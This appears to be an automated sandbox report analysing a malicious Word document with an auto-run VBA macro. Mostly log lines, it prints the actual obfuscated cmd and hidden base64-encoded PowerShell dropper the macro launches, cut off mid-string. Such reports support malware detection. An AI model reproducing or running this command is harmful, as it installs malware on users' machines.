Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0029DBC4	9_2_0029DBC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00282DDF	9_2_00282DDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002857D4	9_2_002857D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002B303C	9_2_002B303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002A87D0	9_2_002A87D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002C1E14	9_2_002C1E14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034C017	9_2_0034C017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354012	9_2_00354012
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034C851	9_2_0034C851
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349846	9_2_00349846
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003590BE	9_2_003590BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003470AD	9_2_003470AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003428AA	9_2_003428AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003450F1	9_2_003450F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003500FE	9_2_003500FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003468EC	9_2_003468EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003430E8	9_2_003430E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E8DD	9_2_0034E8DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B8D8	9_2_0034B8D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003538C2	9_2_003538C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003508CF	9_2_003508CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00357132	9_2_00357132
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035D138	9_2_0035D138
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035891E	9_2_0035891E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B10A	9_2_0034B10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00352179	9_2_00352179
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035B165	9_2_0035B165
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00356158	9_2_00356158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C15B	9_2_0035C15B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003541AB	9_2_003541AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035819F	9_2_0035819F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00341983	9_2_00341983
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034498C	9_2_0034498C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034598B	9_2_0034598B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E272	9_2_0034E272
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035CA55	9_2_0035CA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003492A3	9_2_003492A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349A99	9_2_00349A99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359333	9_2_00359333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034A323	9_2_0034A323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344304	9_2_00344304
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342B70	9_2_00342B70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00351372	9_2_00351372
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034EB54	9_2_0034EB54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342353	9_2_00342353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00351BA5	9_2_00351BA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034DB86	9_2_0034DB86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034D3F5	9_2_0034D3F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034FBE6	9_2_0034FBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B3E8	9_2_0034B3E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349C3D	9_2_00349C3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035CC7F	9_2_0035CC7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00345478	9_2_00345478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354478	9_2_00354478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035BC4D	9_2_0035BC4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003534BF	9_2_003534BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C4A5	9_2_0035C4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346CA5	9_2_00346CA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003514FC	9_2_003514FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003534C3	9_2_003534C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00343523	9_2_00343523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F52E	9_2_0034F52E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00353D29	9_2_00353D29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00352515	9_2_00352515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00340D7A	9_2_00340D7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00345D63	9_2_00345D63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00344D48	9_2_00344D48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00343DB8	9_2_00343DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034D5B8	9_2_0034D5B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C5A1	9_2_0035C5A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349D95	9_2_00349D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350604	9_2_00350604
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359665	9_2_00359665
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B6B9	9_2_0034B6B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342EAC	9_2_00342EAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003566FB	9_2_003566FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035A6D9	9_2_0035A6D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359EDA	9_2_00359EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034FF2C	9_2_0034FF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034EF2E	9_2_0034EF2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035B706	9_2_0035B706
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034177C	9_2_0034177C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00357FA7	9_2_00357FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F797	9_2_0034F797
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F793	9_2_0034F793
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003427F3	9_2_003427F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002BA821	10_2_002BA821

Source: N00048481397007.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open			Name: Document_open

Source: N00048481397007.doc

OLE indicator, VBA macros: true

Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@44/12@6/5

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$0048481397007.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD7F7.tmp

Jump to behavior

Source: N00048481397007.doc

OLE indicator, Word Document stream: true

Source: N00048481397007.doc

OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .C.......C.............p.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......h.q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v............0...............h.q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....H.q.............................}..v............0.................q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............U..j....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............U..j..... ..............................}..v....X.......0.................q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....0Lq.............................}..v.....q......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....@r..............................}..v.....r......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....0Lq.............................}..v.....y......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....@z..............................}..v.....z......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....0Lq.............................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....@...............................}..v............0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................Hq.....(.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....................................}..v............0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.5.............}..v.... .......0................Hq.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....0Lq.............................}..v.... .......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....................................}..v....X.......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....0Lq.............................}..v.... $......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....$..............................}..v....X%......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....0Lq.............................}..v.... ,......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....,..............................}..v....X-......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....0Lq.............................}..v.... 4......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....4..............................}..v....X5......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....0Lq.............................}..v.... <......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....<..............................}..v....X=......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....0Lq.............................}..v.... D......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....D..............................}..v....XE......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... L......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....L..............................}..v....XM......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... T......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....T..............................}..v....XU......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.... \......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....\..............................}..v....X]......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............h.{.}.}.$.J.8.2.E.=.(.'.W.'.+.(.'.2.8.'.+.'.L.'.).)......a......0................Hq.....4.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....@b..............................}..v.....b......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v....hi......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.... j..............................}..v.....j......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0Lq.............................}..v.....o......0.......................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....p..............................}..v....(q......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j....0Lq.............................}..v.....t......0................Hq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....pu..............................}..v.....u......0................Iq.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................e!.j....E...............................}..v............0...............H.q.............................	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKw